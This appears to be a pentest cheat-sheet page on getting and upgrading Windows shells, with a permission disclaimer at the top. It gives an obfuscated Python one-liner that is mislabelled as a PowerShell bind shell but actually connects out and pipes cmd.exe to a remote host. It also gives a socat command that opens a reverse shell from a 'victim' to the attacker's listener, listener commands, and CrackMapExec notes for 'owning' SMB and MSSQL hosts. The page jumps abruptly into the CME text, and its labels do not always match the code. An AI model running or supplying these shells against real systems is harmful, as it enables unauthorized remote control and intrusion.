Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet...please feel free to contribute at my GitHub page.
Bind Shell
PowerShell bind shell one-liner to set up shell listener. Need to customize port on listener.
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect((ipAddress, port)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
The variables ipAddress and port need to be customized. ipAddress must be a string, port must be an integer.
Usually, after catching a reverse shell from a Windows machine through netcat you already have a shell that has full functionality. However, on occasion your shell is limited in some ways that can be truly annoying. The features I miss the most are command history (and using the 'up' and 'down' arrows to cycle through them) and tab autocompletion. It can feel quite disorienting working in a shell that is missing these vital features.
Options for upgrading Windows reverse shells are more limited than they are coming from a Linux machine.
rlwrap
You can mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the rlwrap command. This is not installed in Kali Linux by default so you will need to install it using the command sudo apt install rlwrap -y. Other distributions may or may not have this installed or available in their package manager.
rlwrapnc-lvnp $port
Start your netcat listener by first prefixing it with the rlwrap command, then specifying the port to listen on. Your shell will automatically be a bit more stable than running netcat by itself.
socat
Another powerful tool that can be used to get functional shells, do port forwarding, and much more is socat. (Windows version: https://github.com/3ndG4me/socat)
From your attack platform create a listener
socatTCP4-LISTEN:$port,forkSTDOUT
Upload to or compile socat.exe on the Windows victim machine.
On the Windows victim create the reverse shell back to your waiting listener.
socat.exeTCP4:$ip:$port EXEC:'cmd.exe',pipes
meterpreter
Another method of upgrading the functionality of a Windows reverse shell that I know is to create a reverse shell payload that calls a meterpreter interactive shell. This shell interacts with the Metasploit Framework to provide additional functionality such as uploading and downloading files, attempting to elevate privileges to System, and more.
To use against a specific protocol run cme $protocol $options
available protocols
{http,smb,mssql}
http own stuff using HTTP(S)
smb own stuff using SMB and/or Active Directory
mssql own stuff using MSSQL and/or Active Directory
Using Kerberos
CME supports Kerberos authentication using the --kerberos flag. You must also export the KRB5CCNAME environment variable to specify the ticket. You can get this ticket using Impacket's GetTGT.py.
When using the option --kerberos, you must specify the same hostname (FQDN) as the one from the Kerberos ticket.